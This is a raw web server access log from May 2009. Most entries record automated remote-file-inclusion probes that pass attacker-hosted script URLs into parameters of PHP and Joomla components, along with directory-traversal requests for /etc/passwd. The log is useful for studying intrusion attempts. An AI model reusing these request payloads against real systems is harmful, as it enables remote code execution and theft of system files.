201.232.54.48 - - [30/May/2009:05:30:30 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:05:30:30 -0500] "GET /logs/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.106.179.130 - - [30/May/2009:05:31:51 -0500] "GET /logs//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
87.106.179.130 - - [30/May/2009:05:31:57 -0500] "GET //add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
69.50.197.106 - - [30/May/2009:05:33:03 -0500] "GET //?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:33:03 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:33:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:05:33:05 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:33:45 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:33:45 -0500] "GET /logs/access_log.1242432000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:33:45 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:33:56 -0500] "GET /logs/access_log.1242259200//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
213.151.175.10 - - [30/May/2009:05:42:35 -0500] "GET /logs//add.php?APB_rp=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
65.55.106.229 - - [30/May/2009:05:44:38 -0500] "GET /logs/access_log.1172620800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.249.36.194 - - [30/May/2009:05:48:01 -0500] "GET /logs/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:05:48:01 -0500] "GET /index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:05:48:01 -0500] "GET /logs/access_log.1241913600/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:48:15 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:48:15 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:48:15 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:05:48:23 -0500] "GET /logs/access_log.1236643200//maillist/install/install3.php?database=none&cabsolute_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:05:48:23 -0500] "GET /logs//maillist/install/install3.php?database=none&cabsolute_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:05:48:24 -0500] "GET //maillist/install/install3.php?database=none&cabsolute_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:05:48:32 -0500] "GET /logs/access_log.1238803200//maillist/install/install3.php?database=none&cabsolute_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:49:28 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:49:28 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:49:38 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:49:43 -0500] "GET //login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:49:43 -0500] "GET /logs//login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:49:43 -0500] "GET /logs/access_log.1238803200//login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:49:43 -0500] "GET /logs/access_log.1239494400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:05:49:45 -0500] "GET /index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:05:49:45 -0500] "GET /logs/access_log.1241913600/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:05:49:45 -0500] "GET /logs/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:49:47 -0500] "GET /logs/access_log.1232841600//login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:50:40 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:50:40 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:05:50:41 -0500] "GET /logs/access_log.1239494400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:50:42 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.208.143 - - [30/May/2009:05:51:06 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [30/May/2009:05:51:06 -0500] "GET /logs/access_log.1235779200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
61.81.93.142 - - [30/May/2009:05:51:49 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:51:50 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:51:53 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:53:52 -0500] "GET /logs/access_log.1239494400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:54:32 -0500] "GET /logs/access_log.1239494400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
203.194.204.129 - - [30/May/2009:05:56:28 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.194.204.129 - - [30/May/2009:05:56:28 -0500] "GET /logs/access_log.1242086400//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
203.194.204.129 - - [30/May/2009:05:56:28 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:05:58:32 -0500] "GET /logs/access_log.1231718400//ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:05:58:32 -0500] "GET //ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:05:58:32 -0500] "GET /logs//ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:05:58:38 -0500] "GET /logs/access_log.1234224000//ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
155.185.215.15 - - [30/May/2009:06:00:30 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
155.185.215.15 - - [30/May/2009:06:00:30 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
65.55.106.143 - - [30/May/2009:06:02:08 -0500] "GET /logs/access_log.1191110400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.17.99.13 - - [30/May/2009:06:02:47 -0500] "GET //setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:02:47 -0500] "GET /logs/access_log.1234224000//setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:02:47 -0500] "GET /logs//setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:03:08 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:03:08 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:03:08 -0500] "GET /logs/access_log.1239494400//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.146.255.11 - - [30/May/2009:06:07:20 -0500] "GET /logs/access_log.1241654400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.146.255.11 - - [30/May/2009:06:07:20 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.146.255.11 - - [30/May/2009:06:07:20 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.146.255.11 - - [30/May/2009:06:07:20 -0500] "GET /logs/access_log.1238889600//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
65.55.208.142 - - [30/May/2009:06:07:46 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [30/May/2009:06:07:47 -0500] "GET /logs/access_log.1220659200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.212.165.114 - - [30/May/2009:06:08:13 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.212.165.114 - - [30/May/2009:06:08:13 -0500] "GET //skin/zero_vote/error.php?dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
67.212.165.114 - - [30/May/2009:06:08:13 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.212.165.114 - - [30/May/2009:06:08:25 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
220.181.7.97 - - [30/May/2009:06:08:52 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
76.73.56.159 - - [30/May/2009:06:10:16 -0500] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:10:16 -0500] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:10:17 -0500] "GET /logs/access_log.1238025600/components/com_simpleboard/file_upload.php?sbp=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:12:15 -0500] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:12:15 -0500] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:12:15 -0500] "GET /logs/access_log.1242518400/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:13:28 -0500] "GET /logs/access_log.1233964800//setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.139 - - [30/May/2009:06:14:09 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.73.56.159 - - [30/May/2009:06:14:19 -0500] "GET /logs/access_log.1242000000/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:18:30 -0500] "GET /logs/access_log.1242000000/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:18:30 -0500] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:18:30 -0500] "GET /logs/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:19:05 -0500] "GET /logs/access_log.1242259200/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
24.132.148.25 - - [30/May/2009:06:19:56 -0500] "GET //add.php?APB_rp=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.64"
24.132.148.25 - - [30/May/2009:06:19:57 -0500] "GET /logs//add.php?APB_rp=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.64"
61.109.250.29 - - [30/May/2009:06:23:32 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:06:23:36 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:06:23:36 -0500] "GET /logs/access_log.1240012800//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:06:24:47 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:06:24:51 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:06:24:51 -0500] "GET /logs/access_log.1240012800//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:06:24:57 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:06:25:01 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:06:25:01 -0500] "GET /logs/access_log.1240012800//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:25:33 -0500] "GET //components/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:25:33 -0500] "GET /logs/access_log.1239753600//components/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:25:33 -0500] "GET /logs//components/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:25:47 -0500] "GET //components/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:25:47 -0500] "GET /logs//components/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:25:47 -0500] "GET /logs/access_log.1239753600//components/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
193.231.42.152 - - [30/May/2009:06:30:28 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:30:28 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:30:36 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:30:37 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
123.143.98.5 - - [30/May/2009:06:30:43 -0500] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:06:30:43 -0500] "GET /logs/access_log.1237248000///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:06:30:43 -0500] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:06:30:45 -0500] "GET /logs/access_log.1237248000///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:06:30:45 -0500] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:06:30:45 -0500] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:06:30:52 -0500] "GET /logs/access_log.1238544000///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
123.143.98.5 - - [30/May/2009:06:30:52 -0500] "GET /logs/access_log.1238544000///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
193.231.42.152 - - [30/May/2009:06:32:08 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:32:09 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
24.39.162.98 - - [30/May/2009:06:33:17 -0500] "GET /logs//themes/header.php?theme_directory=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
24.39.162.98 - - [30/May/2009:06:33:17 -0500] "GET //themes/header.php?theme_directory=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
24.39.162.98 - - [30/May/2009:06:33:18 -0500] "GET /logs//themes/header.php?theme_directory=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
24.39.162.98 - - [30/May/2009:06:33:18 -0500] "GET //themes/header.php?theme_directory=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
85.17.162.28 - - [30/May/2009:06:34:23 -0500] "GET /logs/index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:06:34:28 -0500] "GET /index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:06:34:33 -0500] "GET /index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:06:34:35 -0500] "GET /logs/index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.18.148.82 - - [30/May/2009:06:35:58 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:35:58 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:35:58 -0500] "GET /logs/access_log.1236643200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:36:05 -0500] "GET /index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.18.148.82 - - [30/May/2009:06:36:06 -0500] "GET /logs/access_log.1233705600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:36:07 -0500] "GET /logs/index2.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.234.23.43 - - [30/May/2009:06:36:08 -0500] "GET /logs//yacs/scripts/update_trailer.php?context[path_to_root]=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
218.234.23.43 - - [30/May/2009:06:36:08 -0500] "GET //yacs/scripts/update_trailer.php?context[path_to_root]=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
